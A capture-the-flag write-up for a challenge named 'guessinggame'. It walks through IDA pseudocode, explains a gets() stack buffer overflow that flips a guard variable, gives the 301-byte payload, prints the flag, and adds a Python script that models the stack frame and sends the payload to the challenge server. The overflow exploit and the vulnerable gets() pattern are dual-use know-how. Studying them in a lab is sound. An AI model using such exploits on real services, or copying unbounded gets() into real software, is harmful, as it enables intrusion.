# guessinggame

No one seems to be able to guess my favorite animal... Can you?

`nc chal.pctf.competitivecyber.club 9999`

## Solution

I loaded it into IDA; here is the pseudocode it generated, which I looked at.

**main()**

```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
    puts("Hello there, friend! Can you guess my favorite animal?");
    check("Hello there, friend! Can you guess my favorite animal?", argv);
    return 0;
}
```

**check()**

```c
int check()
{
    int result; // eax
    char s2[8]; // [rsp+8h] [rbp-138h] BYREF
    char s1[300]; // [rsp+10h] [rbp-130h] BYREF
    int v3; // [rsp+13Ch] [rbp-4h]

    strcpy(s2, "Giraffe");
    v3 = 0;
    printf("Input guess: ");
    gets(s1);
    if ( !strcmp(s1, s2) )
        result = puts("That's not my favorite animal... I promise!");
    else
        result = puts("ERRR! Wrong!");
    if ( v3 )
    {
        puts("I wasn't able to trick you...");
        return outputFlag();
    }
    return result;
}
```

Analyzing this function, we can see that `v3` needs to be non-zero for us to get the flag (the check is `if ( v3 )`), but nothing in the program ever assigns it anything other than `0`, so there is no way to set it directly. The IDA stack annotations give the layout away, though: the input is read with `gets()` into `s1` at `rbp-0x130`, a 300-byte buffer, and `v3` sits at `rbp-0x4`, which is exactly `0x130 - 0x4 = 0x12C = 300` bytes after the start of `s1`. Since `gets()` has no length limit, a payload of 300 bytes of filler followed by `\x01` overflows `s1` and lands that byte in the low byte of `v3`. Any non-zero byte would do; exactly 300 bytes would not, because the NUL that `gets()` appends would land in `v3` and leave it `0`.

```python
payload = b"A" * 0x12C + b"\x01"  # 0x12C = 0x130 - 0x4: fill s1, then overwrite the low byte of v3
```

If we send this payload (as raw bytes, since `\x01` is not printable), it overflows `s1`, sets `v3` to `1`, and the program prints the flag:

```
PCTF{1_l0v3_g1raff35_85036769}
```
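
The following is an added example, not part of the original writeup: it models the `check()` stack frame from the IDA offsets as a byte array so the offset arithmetic can be checked offline, and it wraps the delivery in a plain-socket sender for the host and port from the challenge banner. The frame model is an assumption that the decompiler's offsets are accurate and that there is no stack canary between `s1` and `v3` (the writeup's successful exploit implies both); `send_payload` and `simulate_check` are names chosen here, not functions from the challenge.

```python
"""Offline model of check()'s frame plus a sender for the remote service.

Offsets come from the IDA listing: s1 at rbp-0x130 (300 bytes) and v3 at
rbp-0x4 (4 bytes), so v3 begins 0x12C == 300 bytes after s1.  This is an
added example; the frame layout is assumed to match the decompiler output.
"""
import socket
import struct

S1_OFFSET = 0x130                  # rbp-0x130: start of s1
V3_OFFSET = 0x4                    # rbp-0x4:   start of v3
S1_SIZE = S1_OFFSET - V3_OFFSET    # 0x12C == 300 bytes between them
FRAME_SIZE = S1_OFFSET             # bytes from s1 up to (not including) saved rbp


def build_payload(filler: bytes = b"A", marker: bytes = b"\x01") -> bytes:
    """Exactly S1_SIZE bytes of filler followed by one non-zero byte that
    lands in the low byte of v3.  Returned as bytes, not str: \\x01 is not
    printable, so a str pasted into nc would not survive intact."""
    payload = filler * S1_SIZE + marker
    # gets() stops at the first newline, so the payload itself must not contain one.
    if b"\n" in payload:
        raise ValueError("payload would be truncated by gets()")
    return payload


def simulate_check(line: bytes) -> int:
    """Model what gets(s1) does to the frame and return the value v3 ends up
    holding.  s1 occupies frame[0:300] and v3 occupies frame[300:304],
    exactly as in the decompiled layout; v3 starts at 0 as in the binary."""
    frame = bytearray(FRAME_SIZE)
    # gets() copies every byte up to the newline and then appends a NUL,
    # with no bounds check on the destination.
    body = line.split(b"\n", 1)[0]
    data = body + b"\x00"
    frame[0:len(data)] = data          # the overflow: nothing stops it at 300
    return struct.unpack_from("<i", frame, S1_SIZE)[0]


def flag_reachable(line: bytes) -> bool:
    """True when the input would make `if ( v3 )` succeed."""
    return simulate_check(line) != 0


def send_payload(host: str = "chal.pctf.competitivecyber.club", port: int = 9999) -> bytes:
    """Deliver the payload over a raw socket and return everything the
    service sends back; on success the flag line is in that output."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(build_payload() + b"\n")
        out = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            out += chunk
    return out


if __name__ == "__main__":
    print(send_payload().decode(errors="replace"))
```

Running the model first is a cheap sanity check before touching the network: `simulate_check(b"A" * 300 + b"\n")` returns `0` because the trailing NUL from `gets()` lands in `v3`, while `simulate_check(build_payload() + b"\n")` returns `1`, which is why the payload needs the 301st byte.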